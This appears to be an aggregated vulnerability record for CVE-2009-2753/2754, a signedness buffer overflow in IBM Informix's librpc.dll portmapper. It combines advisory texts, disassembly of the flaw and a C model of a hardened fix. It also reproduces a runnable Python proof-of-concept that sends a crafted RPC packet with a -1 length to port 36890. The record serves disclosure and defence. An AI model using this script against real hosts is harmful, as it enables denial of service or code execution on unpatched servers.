Informix Dynamic Server is a database solution from IBM. It includes a portmapper service which listens for connections on port 36890/TCP and uses librpc.dll.
Problem
A buffer overflow vulnerability in librpc.dll allows remote attackers to execute arbitrary commands by sending a request containing an invalid credentials length parameter to the portmapper service.
Resolution
Upgrade to version 10.00.TC9, 10.00.TC10, 11.10.TC3, or 11.10.TC4 or higher.
References
http://secunia.com/advisories/38731
Limitations
Exploit works on Informix Dynamic Server 11.10.TC1 on Windows Server 2003 SP2 with security updates KB956802 and KB956572 installed and DEP disabled.
Platforms
Windows Server 2003
Record details
Title: Informix Dynamic Server librpc.dll credentials length buffer overflow
Reporter: SAINT Corporation
Added: 06/10/2010
CVE: CVE-2009-2753 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2753)
BID: 38471 (http://www.securityfocus.com/bid/38471)
OSVDB: 62783 (http://www.osvdb.org/62783)
CVSS: 10.0 (AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE)
Source: http://www.saintcorporation.com/cgi-bin/exploit_info/informix_librpc_credentials_length
Background link: http://www-306.ibm.com/software/data/informix/ids/
Related records

CVE-2009-2753 (NVD, published 2010-03-05, CVSS 10.0 AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE)
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2753
Multiple buffer overflows in the authentication functionality in librpc.dll in the Informix Storage Manager (ISM) Portmapper service (aka portmap.exe), as used in IBM Informix Dynamic Server (IDS) 10.x before 10.00.TC9 and 11.x before 11.10.TC3, allow remote attackers to execute arbitrary code via a crafted parameter size.

SAINT:B265BA7F4A8E365988E9F0960416BA2C and SAINT:F1C713FF953F799EA6E80E6BA7A51D4E (SAINT, published 2010-06-10)
http://download.saintcorporation.com/cgi-bin/exploit_info/informix_librpc_credentials_length
https://my.saintcorporation.com/cgi-bin/exploit_info/informix_librpc_credentials_length
Mirrors of the SAINT entry above, with the same title and text.

SECURITYVULNS:VULN:10673 - librpc.dll library multiple security vulnerabilities (published 2010-03-04)
https://vulners.com/securityvulns/SECURITYVULNS:VULN:10673
Multiple buffer overflows and integer overflows.

ZDI-10-022 - IBM Informix librpc.dll Multiple Remote Code Execution Vulnerabilities (ZDI, published 2010-03-01; also indexed as SECURITYVULNS:DOC:23327, published 2010-03-04, https://vulners.com/securityvulns/SECURITYVULNS:DOC:23327)
http://www.zerodayinitiative.com/advisories/ZDI-10-022
Advisory text as published:

ZDI-10-022: IBM Informix librpc.dll Multiple Remote Code Execution Vulnerabilities
http://www.zerodayinitiative.com/advisories/ZDI-10-022
March 1, 2010

-- CVE ID:
CVE-2009-2753

-- Affected Vendors:
IBM

-- Affected Products:
IBM Informix

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5937. For further product information on the TippingPoint IPS, visit:

 http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on vulnerable installations of both IBM Informix Dynamic Server and EMC Legato Networker. User interaction is not required to exploit this vulnerability.

The specific flaws exist within the RPC protocol parsing library, librpc.dll, utilized by the ISM Portmapper service (portmap.exe) bound by default to TCP port 36890. During authentication, a lack of proper sanity checking on supplied parameter sizes can result in exploitable stack and heap based buffer overflows leading to arbitrary code execution under the context of the SYSTEM user.

-- Vendor Response:
IBM states that this issue was first fixed in: IDS 10.00.TC9, IDS 11.10.TC3 Recommended fix pack version: IDS 10.00.TC10, IDS 11.10.TC3 4.
URL to APAR or fixpack Fix pack download URL:
http://www-933.ibm.com/support/fixcentral/
APAR URLs
 http://www.ibm.com/support/docview.wss?uid=swg1IC55329
 http://www.ibm.com/support/docview.wss?uid=swg1IC55330

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2010-03-01 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
 * Sebastian Apelt (sebastian.apelt@siberas.de)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

 http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

 http://www.zerodayinitiative.com/advisories/disclosure_policy/

EDB-ID:12109 - Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability (Exploit-DB, published 2010-04-08, CVSS 10.0)
https://www.exploit-db.com/exploits/12109/
Source: https://www.exploit-db.com/download/12109/
Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability. CVE-2009-2753, CVE-2009-2754. DoS exploit for multiple platforms.

Proof-of-concept script as published by ZSploit.com (zs_ids_rpc.py; the original is Python 2 and is shown here in Python 3 syntax, sending the same bytes):

```python
# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
# Date: 2010-04-08
# Author: ZSploit.com
# Software Link: N/A
# Version: N/A
# Tested on: IBM Informix Dynamic Server 10.0
# CVE : CVE-2009-2754

#! /usr/bin/env python3
###############################################################################
## File : zs_ids_rpc.py
## Description:
## :
## Created_On : Mar 21 2010
##
## (c) Copyright 2010, ZSploit.com. all rights reserved.
###############################################################################
"""
The issue in __lgto_svcauth_unix():

.text:1000B8E1 mov [ebp+0], eax
.text:1000B8E4 mov eax, [ebx]
.text:1000B8E6 push eax ; netlong
.text:1000B8E7 add ebx, 4
.text:1000B8EA call esi ; ntohl ; Get length of hostname
.text:1000B8EC cmp eax, 0FFh ; Signedness error, if we give 0xffffffff(-1) will pass this check
.text:1000B8F1 jle short loc_1000B8FD
.text:1000B8F3 mov esi, 1
.text:1000B8F8 jmp loc_1000B9D5
.text:1000B8FD ; ---------------------------------------------------------------------------
.text:1000B8FD
.text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71↑j
.text:1000B8FD mov edi, [ebp+4]
.text:1000B900 mov ecx, eax
.text:1000B902 mov edx, ecx
.text:1000B904 mov esi, ebx
.text:1000B906 shr ecx, 2
.text:1000B909 rep movsd ; call memcpy here with user-supplied size cause a stack overflow
.text:1000B90B mov ecx, edx
.text:1000B90D add eax, 3
.text:1000B910 and ecx, 3
.text:1000B913 rep movsb
"""

import sys
import socket

if len(sys.argv) != 2:
    print("Usage:\t%s [target]" % sys.argv[0])
    sys.exit(0)


# ONC RPC call record: AUTH_UNIX credentials (flavor 1, length 0x4c) whose
# machine-name length field is 0xffffffff, the value the signed check accepts.
data = b"\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \
       b"\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \
       b"\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \
       b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \
       b"\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \
       b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
       b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
       b"\x00\x00\x00\x00\x00\x00\x00\x00"

host = sys.argv[1]
port = 36890

print("PoC for ZDI-10-023 by ZSploit.com")
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.send(data)
        print("Sending payload ..")
    except Exception:
        print("Error in send")
    print("Done")
except Exception:
    print("Error in socket")
```

The ZSploit Team
http://zsploit.com
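The disassembly in the record above shows the root cause: `cmp eax, 0FFh` / `jle` treats the network-supplied machine-name length as a signed value, so 0xffffffff (-1) passes the 255-byte limit and is then used as the `rep movsd` copy size. The following C model is added here and is not librpc.dll's code: it reproduces that signed check beside a hardened parse that compares unsigned, against both the destination size and the bytes actually present in the request. The 255-byte buffer, the big-endian length-prefixed layout and the function names are assumptions for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout of the AUTH_UNIX machine-name field: a big-endian 32-bit
 * length followed by the name bytes. MAX_MACHINENAME mirrors the 0xFF limit
 * seen in the disassembly; the destination buffer size is an assumption. */
#define MAX_MACHINENAME 255

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Vulnerable pattern (model of "cmp eax, 0FFh / jle"): the compare is signed,
 * so a length of 0xffffffff (-1) is accepted and would drive the copy.
 * Returns 1 if the length would be accepted, 0 if rejected. */
int vulnerable_accepts_len(const uint8_t *cred) {
    int32_t len = (int32_t)be32(cred);   /* ntohl result used as signed */
    return len <= MAX_MACHINENAME;       /* -1 <= 255 is true */
}

/* Hardened parse: unsigned compare against the destination capacity and
 * against the bytes remaining in the request, then a bounded copy.
 * Returns the name length on success, -1 if the field is rejected. */
int parse_machinename(const uint8_t *cred, size_t cred_len,
                      char *out, size_t out_sz) {
    if (cred_len < 4 || out_sz == 0) return -1;
    uint32_t len = be32(cred);
    if (len > MAX_MACHINENAME || len > out_sz - 1) return -1;
    if (len > cred_len - 4) return -1;   /* claimed length exceeds payload */
    memcpy(out, cred + 4, len);
    out[len] = '\0';
    return (int)len;
}

int main(void) {
    /* Constructed sample: the -1 length from the published PoC. */
    const uint8_t bad[4] = {0xff, 0xff, 0xff, 0xff};
    char name[MAX_MACHINENAME + 1];
    printf("signed check accepts 0xffffffff: %d\n", vulnerable_accepts_len(bad));
    printf("hardened parse result: %d\n", parse_machinename(bad, 4, name, sizeof name));
    return 0;
}
```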